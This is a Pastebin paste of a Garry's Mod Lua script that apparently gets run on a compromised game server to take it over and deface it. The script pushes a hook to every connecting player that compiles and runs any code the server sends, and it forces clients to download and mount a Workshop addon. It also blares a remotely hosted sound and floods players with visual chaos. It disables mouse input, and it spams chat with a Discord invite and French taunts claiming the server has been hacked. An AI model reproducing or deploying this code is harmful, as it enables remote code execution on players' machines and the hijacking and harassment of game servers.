Advertisement
Guest User

Untitled

a guest
Jun 25th, 2019
42
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.17 KB | None | 0 0
  1.  
  2. GizehSSV = GizehSSV or {}
  3. GizehSSV.Wait1 = GizehSSV.Wait1 or !!1
  4. GizehSSVLogo = GizehSSVLogo or nil
  5. GizehSSV.Enabled = GizehSSV.Enabled or !!1
  6.  
  7. local function rdm_str(len)
  8. if !len or len <= 0 then return '' end
  9. return rdm_str(len - 1) .. ("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")[math.random(1, 62)]
  10. end
  11.  
  12. local net_string = rdm_str(25)
  13.  
  14. util.AddNetworkString(net_string)
  15. BroadcastLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  16. hook.Add("PlayerInitialSpawn", "ifyouseethisdontpanicitsme",function(ply)
  17. if !ply:IsBot() then
  18. ply:SendLua([[net.Receive("]] .. net_string .. [[",function()CompileString(util.Decompress(net.ReadData(net.ReadUInt(16))),"?")()end)]])
  19. end
  20. end)
  21.  
  22.  
  23.  
  24. local function SendToClient(code)
  25. timer.Simple(5, function()
  26. local data = util.Compress(code)
  27. local len = #data
  28. net.Start(net_string)
  29. net.WriteUInt(len, 16)
  30. net.WriteData(data, len)
  31. net.Broadcast()
  32. end)
  33. end
  34.  
  35.  
  36.  
  37.  
  38. for k, v in pairs(player.GetAll()) do
  39. v:SendLua("steamworks.FileInfo(1780871251,function(result)steamworks.Download(result.fileid,true,function(name)game.MountGMA(name)end) end)")
  40. end
  41.  
  42. for k, v in pairs( player.GetAll() ) do
  43. if ( v:Alive() ) then
  44. v:GodEnable()
  45. else
  46. v:Spawn()
  47. timer.Simple( 5, function()
  48. v:GodEnable()
  49. end)
  50. end
  51. end
  52.  
  53.  
  54. game.AddParticles( "particles/comite.pcf" )
  55. PrecacheParticleSystem("comite")
  56.  
  57. SendToClient([====[
  58. local t = "https://discord.gg/uXXNfmv"
  59. if t:len() > 0 then
  60. surface.CreateFont("\xFF\xFF\xFF", {
  61. font = "Impact",
  62. size = 999
  63. })
  64.  
  65. for i = 1, 10 do
  66. ParticleEffectAttach("comite",PATTACH_ABSORIGIN_FOLLOW,LocalPlayer(),0)
  67. end
  68.  
  69. local mat = Matrix()
  70. hook.Add("HUDPaint","\xFFmlg_text\xFF", function()
  71. surface.SetFont("\xFF\xFF\xFF")
  72. local x = ScrW() / 2 - (surface.GetTextSize(t)/2) + math.cos(CurTime()*3) * 40
  73. local y = 100 + math.sin(CurTime()*2) * 40
  74. local pos = Vector(x,y,0)
  75. mat:SetAngles(Angle(0,math.sin(CurTime()/1.2)*10,0))
  76. mat:SetTranslation(pos)
  77. surface.SetTextPos(0,0)
  78. cam.PushModelMatrix(mat)
  79. for i=#t, 1, -1 do
  80. surface.SetTextColor( HSVToColor((CurTime()*200+i*7)%360,1,1) )
  81. surface.DrawText(t[ #t - i + 1 ])
  82. end
  83. cam.PopModelMatrix()
  84. end)
  85. else
  86. hook.Remove("HUDPaint","\xFFmlg_text\xFF")
  87. end
  88.  
  89. local chair = ClientsideModel("models/props_c17/chair02a.mdl")
  90. chair:SetNoDraw(true)
  91. local data = {}
  92. local function genChair(id)
  93. local pos = LocalPlayer():GetPos()
  94. data[id] = { Vector(math.random(pos.x-1000,pos.x+1000),math.random(pos.y-1000,pos.y+1000),pos.z + math.random(800,1000) ), math.random(10, 70) }
  95. end
  96. for i=1, 70 do
  97. genChair(i)
  98. end
  99. hook.Add("PostDrawOpaqueRenderables","\xFFitsrainingchairs\xFF",function()
  100. local z = LocalPlayer():GetPos().z
  101. for i=1, #data do
  102. chair:SetPos(data[i][1])
  103. chair:SetupBones()
  104. chair:DrawModel()
  105. data[i][1].z = data[i][1].z - data[i][2] / 20
  106. if data[i][1].z <= z then
  107. genChair(i)
  108. end
  109. end
  110. end)
  111.  
  112. local gfx = {}
  113.  
  114. local messages = {
  115. "Votre serveur a était hacké par le comité d'éclateur de serveur",
  116. "la ref#8219 NeRoW.#7280 Esma Network lvl 998#6877",
  117. "Discord: https://discord.gg/uXXNfmv",
  118. "Votre serveur va plutôt bien marcher",
  119. "Maintenant il nous appartient.",
  120. "Vous pouvez maintenant pleurer.",
  121. "#Owned #Hacked #Tonserveurcdlamerde"
  122. }
  123.  
  124.  
  125. hook.Add("HUDPaint", "FUCKIT_G",function()
  126. for k,v in pairs(gfx) do
  127. v()
  128. end
  129. end)
  130.  
  131. local message = "Ne redemmare pas ton server, cela ne sert a rien"
  132. local function SlowType(msg,interval,callback)
  133. callback = callback or function()end
  134. message = ""
  135. for i=1,#msg do
  136. timer.Simple(interval * i,function()
  137. message = message .. msg[i]
  138. end)
  139. end
  140. timer.Simple(#msg*interval,callback)
  141. end
  142. local function GetRandomSpot()
  143. local ppos = LocalPlayer():GetPos()
  144. return Vector(ppos.x + math.random(-500, 500),ppos.y + math.random(-500, 500),ppos.z + math.random(-10, 10))
  145. end
  146. surface.CreateFont("PWN",{bold=true,size=40})
  147. SOUNDSTART_CTP = false
  148. sound.PlayURL("https://testfdh.000webhostapp.com/larefclemeilleur.mp3","no block",function(s)
  149. if not s then return end
  150. if SOUNDSTART_CTP then s:Stop() return end
  151. SOUNDSTART_CTP = true
  152.  
  153.  
  154. local ragtbl = {}
  155. for i=1,20 do
  156. ragtbl[i] = ClientsideRagdoll( "models/player/gman_high.mdl" )
  157. ragtbl[i]:SetNoDraw( false )
  158. ragtbl[i]:DrawShadow( true )
  159. end
  160.  
  161.  
  162. timer.Create("ChangeRagdolesSpotsAW", 1, 0, function()
  163. for k,v in pairs(ragtbl) do
  164. v:SetPos(GetRandomSpot())
  165. end
  166. end)
  167.  
  168.  
  169. hook.Add("AdjustMouseSensitivity","MDR",function()
  170. return 0
  171. end)
  172. gfx["CoolEffect"] = function()
  173. local tbl = {}
  174. s:FFT(tbl,FFT_2048)
  175.  
  176. local fal = 0
  177. for i=4,6 do
  178. fal = fal + tbl[i]
  179. end
  180.  
  181. if fal > 0.8 then
  182. local ca = Color(math.random(0,255),math.random(0,255),math.random(0,255), 150)
  183. gfx["ColorChange"] = function()
  184. draw.RoundedBoxEx(250, 0, 0, ScrW(),ScrH(),ca)
  185. end
  186. util.ScreenShake(LocalPlayer():GetPos(),20,20,0.5,20)
  187. local mats = Entity(0):GetMaterials()
  188. for k,v in pairs(mats) do
  189. local r,g,b = ColorRand().r-50, ColorRand().g-50, ColorRand().b-50
  190. Material(v):SetVector("$color", Vector(r,g,b))
  191. Material(v):SetTexture( "$basetexture", "_rt_fullframefb" )
  192. end
  193. end
  194. for k,v in pairs(tbl) do
  195. local col = HSVToColor(k * 1 % 360,1,1)
  196. draw.RoundedBoxEx(0,0,k * 10, (v*10000), 10,col)
  197. draw.RoundedBoxEx(0,ScrW() - (v*10000),k * 10, (v*10000), 10,col)
  198. end
  199. end
  200.  
  201. timer.Simple(29, function()
  202.  
  203. hook.Add("GetMotionBlurValues", "YASS",function(a,b,c,d)
  204. return a,b,c+140,d
  205. end)
  206.  
  207.  
  208. end)
  209.  
  210. local cc = 1
  211. local omgs = {}
  212. timer.Create("MVSPOS", 0.04, 0, function()
  213. for k,v in pairs(omgs) do
  214. if omgs[ k ].n <= 0 then omgs[ k ] = nil continue end
  215. omgs[ k ] = {text = omgs[ k ].text, n = omgs[ k ].n - 1}
  216. end
  217. end)
  218. local isPounding = false
  219.  
  220. timer.Create("NEXTMSG", 6, #messages, function()
  221. if cc > #messages then
  222. isPounding = true
  223. return
  224. end
  225. table.insert(omgs, {text = messages[ cc ],n = ScrH()})
  226. cc = cc + 1
  227. end)
  228.  
  229. gfx["MessageC"] = function()
  230. if isPounding and (#messages <= 0) then
  231. draw.SimpleText("RT ton server <3", "PWN", ScrW() / 2, ScrH() / 2,Color(200,0,0),1,1)
  232. end
  233. for k,v in pairs(omgs) do
  234. draw.SimpleText(omgs[ k ].text, "PWN", ScrW() / 2, omgs[ k ].n,Color(0,0,0),1,1)
  235. end
  236. end
  237. end)
  238. concommand.Add("canard", function()
  239. hook.Remove("GetMotionBlurValues", "YASS")
  240. hook.Remove("AdjustMouseSensitivity","MDR")
  241. hook.Remove("HUDPaint", "FUCKIT_G")
  242. end)
  243. ]====])
  244.  
  245. timer.Create("aaneyjvkybtk", 0.1, 0, function()
  246. if not GizehSSV.Enabled then return end
  247. local mat = Entity(0):GetMaterials()
  248. for k,v in pairs(mat) do
  249. if GizehSSV.Wait1 then
  250. local col = HSVToColor( CurTime() % 6 * 60, 1, 1 )
  251. Material(v):SetVector("$color", Vector(col.r/220,col.g/220,col.b/220))
  252. else
  253. local col = Color(math.random(170,220),math.random(170,220),math.random(170,220))
  254. Material(v):SetVector("$color", Vector(col.r-200,col.g-200,col.b-200))
  255. end
  256. end
  257. end)
  258.  
  259. timer.Create("qqyptebobvnq", 1.5, 0, function()
  260. local time = tonumber(0)
  261. local Message = {
  262. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  263. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  264. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  265. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  266. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  267. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  268. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  269. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  270. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  271. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  272. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  273. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  274. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  275. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  276. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  277. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  278. "/ooc DISCORD : https://discord.gg/uXXNfmv",
  279. }
  280. for _, line in pairs(Message) do
  281. time = time + tonumber(0.1)
  282. timer.Simple(time,function()
  283. if not GizehSSV.Enabled then return end
  284. chat.AddText(HSVToColor( CurTime() % 6 * 60, 1, 1 ),line)
  285. end)
  286. end
  287. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement